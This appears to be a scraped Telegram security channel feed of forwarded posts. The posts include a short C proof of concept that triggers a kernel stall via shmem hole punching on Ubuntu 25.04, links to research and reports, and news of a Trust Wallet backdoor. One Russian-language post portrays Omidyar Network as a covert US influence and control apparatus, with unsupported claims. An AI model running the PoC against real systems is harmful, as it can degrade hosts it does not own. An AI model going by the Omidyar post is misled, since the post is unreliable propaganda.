Forwarded from Proxy Bar
Ubuntu 25.04 (ядро 6.14.11)
минимальный POC
What ?
минимальный POC
What ?
#define _GNU_SOURCE
#include <sys/mman.h>
#include <fcntl.h>
#include <stdio.h>
#include <linux/falloc.h>
#include <err.h>
#include <pthread.h>
#define SYSCHK(x) ({ \
typeof(x) __res = (x); \
if (__res == (typeof(x))-1) \
err(1, "SYSCHK(" #x ")"); \
__res; \
})
#define FALLOC_LEN 64 * 1024 * 1024 // Max on Ubuntu 25.04
pthread_barrier_t barrier;
int ffd;
char *fmap;
void hole_punch() {
SYSCHK(ffd = open("/dev/shm/", O_TMPFILE | O_RDWR, 0666));
SYSCHK(fallocate(ffd, 0, 0, FALLOC_LEN));
SYSCHK(fmap = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, ffd, 0));
pthread_barrier_wait(&barrier); // barrier 1
SYSCHK(fallocate(ffd, FALLOC_FL_PUNCH_HOLE | FALLOC_FL_KEEP_SIZE, 0, FALLOC_LEN));
}
int main(void) {
pthread_barrier_init(&barrier, NULL, 2);
pthread_t hole_punch_thread;
SYSCHK(pthread_create(&hole_punch_thread, NULL, (void*)hole_punch, NULL));
struct timespec start, end;
pthread_barrier_wait(&barrier); // barrier 1
clock_gettime(CLOCK_MONOTONIC, &start);
volatile char dummy = *(char *)fmap; // Simulated kernel access during hole punch
clock_gettime(CLOCK_MONOTONIC, &end);
long long stall_ns = (end.tv_sec - start.tv_sec) * 1000000000LL + (end.tv_nsec - start.tv_nsec);
printf("Stall time: %lld ns\n", stall_ns);
}
🥰3
Forwarded from Сводки частной разведки
Omidyar Network.pdf
2.7 MB
Этот материал подготовлен выпускниками курса «Разведывательный анализ информации» Университета Прокси-разведки.
Omidyar Network представляет собой не традиционную благотворительную структуру, а сложный гибридный институт глобального влияния, совмещающий функции частного инвестиционного фонда, венчурного акселератора и оператора инструментов «мягкой силы» Соединённых Штатов Америки. Деятельность организации направлена на поддержание геополитических и идеологических интересов западной либеральной элиты.
Под видом поддержки «социального предпринимательства», «финансовой инклюзии» и «независимой журналистики» Omidyar Network участвует в гибридных режимных операциях, включая финансирование антиправительственных структур в ходе событий на Украине (2013–2014), а также поддержку дестабилизационных протестных движений в Нигерии, Филиппинах и других странах. Организация тесно взаимодействует с ключевыми внешнеполитическими структурами архитектуры США, в частности, с Агентством США по международному развитию (USAID) и Национальным фондом демократии (NED) , а также с крупнейшими филантропическими платформами, включая Фонд Сороса, Фонд Билла и Мелинды Гейтс, и другие, формируя коалиционную сеть, координирующую глобальную повестку в области «демократии», «цифровых прав» и «гражданского общества».
Особую обеспокоенность вызывает реализуемая фондом стратегия «цифровой трансформации», включающая такие инициативы, как MOSIP (модульная платформа цифровой идентификации), Better Than Cash Alliance и глобальную кампанию «50-in-5» по внедрению цифровой общественной инфраструктуры (DPI). Данные проекты создают основу для тотального контроля: через универсальную цифровую идентификацию, обязательный переход к безналичным расчётам, а также алгоритмические системы оценки поведения граждан.
Таким образом, Omidyar Network функционирует как один из наиболее влиятельных нетрадиционных инструментов внешнего воздействия, действующий в рамках формальной легальности, но по существу являющийся частно-государственным аппаратом системного вмешательства, маскирующим политическую инженерию под филантропию и технологический прогресс.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2😁1
Forwarded from reconcore
Tor_Pentest_Report.pdf
1.2 MB
Tor Project Pentest - Code audit and network health report 2025.
#netsec #appsec #analytics #offensivesecurity @reconcore
This document outlines the results of a pentest and whitebox security review conducted against a number of Tor Project items. Test Targets: Network Metrics, Visualization Stack, Relay & Network Health Tools, Exit Relay Scanning, Bandwidth Measurement, Tor Core Code Changes
#netsec #appsec #analytics #offensivesecurity @reconcore
❤3
earlyremoval, in the Conservatory, with the Wrench: Exploring Ghidra’s decompiler internals to make automatic P-Code analysis noscripts
https://www.nccgroup.com/research-blog/earlyremoval-in-the-conservatory-with-the-wrench-exploring-ghidra-s-decompiler-internals-to-make-automatic-p-code-analysis-noscripts/
https://www.nccgroup.com/research-blog/earlyremoval-in-the-conservatory-with-the-wrench-exploring-ghidra-s-decompiler-internals-to-make-automatic-p-code-analysis-noscripts/
Ghidriff - Ghidra Binary Diffing Engine
https://i.blackhat.com/SecTor-2023/Presentations/Sector-23-McIntosh-GhidriffGhidraBinaryDiffingEngine-compressed.pdf
https://i.blackhat.com/SecTor-2023/Presentations/Sector-23-McIntosh-GhidriffGhidraBinaryDiffingEngine-compressed.pdf
Forwarded from H
Hi
This is Hosien , currently i'm investigating a malware campaign targeting Iranian spoken users , exploiting winrar (likely cve-2025-6218 or cve-2025-8088) . the code they used are advanced and i think we face APT or skillful cyber-criminals .
i'm asking you to share this message so we can find out how this Threat Actor spread it's malware above images show .rar file & opened decoy .doc file
This is Hosien , currently i'm investigating a malware campaign targeting Iranian spoken users , exploiting winrar (likely cve-2025-6218 or cve-2025-8088) . the code they used are advanced and i think we face APT or skillful cyber-criminals .
i'm asking you to share this message so we can find out how this Threat Actor spread it's malware above images show .rar file & opened decoy .doc file
🔥2
Source Byte
Hi This is Hosien , currently i'm investigating a malware campaign targeting Iranian spoken users , exploiting winrar (likely cve-2025-6218 or cve-2025-8088) . the code they used are advanced and i think we face APT or skillful cyber-criminals . i'm asking…
share here if you find something (any phishing emails , telegram post ....) :
https://news.1rj.ru/str/+SdT344H5Yec2YTRk
https://news.1rj.ru/str/+SdT344H5Yec2YTRk
2022 0-day In-the-Wild Exploitation…so far
As of June 15, 2022, there have been 18 0-days detected and disclosed as exploited in-the-wild in 2022. When we analyzed those 0-days, we found that at least nine of the 0-days are variants of previously patched vulnerabilities. At least half of the 0-days we’ve seen in the first six months of 2022 could have been prevented with more comprehensive patching and regression tests. On top of that, four of the 2022 0-days are variants of 2021 in-the-wild 0-days. Just 12 months from the original in-the-wild 0-day being patched, attackers came back with a variant of the original bug.
https://projectzero.google/2022/06/2022-0-day-in-wild-exploitationso-far.html
As of June 15, 2022, there have been 18 0-days detected and disclosed as exploited in-the-wild in 2022. When we analyzed those 0-days, we found that at least nine of the 0-days are variants of previously patched vulnerabilities. At least half of the 0-days we’ve seen in the first six months of 2022 could have been prevented with more comprehensive patching and regression tests. On top of that, four of the 2022 0-days are variants of 2021 in-the-wild 0-days. Just 12 months from the original in-the-wild 0-day being patched, attackers came back with a variant of the original bug.
https://projectzero.google/2022/06/2022-0-day-in-wild-exploitationso-far.html
❤4
Playing with the Tigress software protection. Break some of its protections and solve their reverse engineering challenges. Automatic deobfuscation using symbolic execution, taint analysis and LLVM.
https://tigress.cs.arizona.edu/challenges.html
https://tigress.cs.arizona.edu/challenges.html
❤3
Source Byte
Playing with the Tigress software protection. Break some of its protections and solve their reverse engineering challenges. Automatic deobfuscation using symbolic execution, taint analysis and LLVM. https://tigress.cs.arizona.edu/challenges.html
www.cs.cornell.edu
Flattening ASTs (and Other Compiler Data Structures)
This is an introduction to data structure flattening, a special case of arena allocation that is a good fit for programming language implementations. We build a simple interpreter twice, the normal way and the flat way, and show that some fairly mechanical…
❤4
Backdoor code found in Trust Wallet browser extension, causing theft of tens of millions of dollars in assets
A new backdoor code was added to version 2.68 of the Trust Wallet cryptocurrency wallet's browser extension, which sends users' mnemonic phrases to attacker servers. Due to the automatic update mechanism, the impact was widespread. On Christmas Day, December 25th, attackers began transferring funds, and according to current estimates, more than tens of millions of dollars in assets have been stolen. The latest version 2.69 has now removed the backdoor code.
🔥1😁1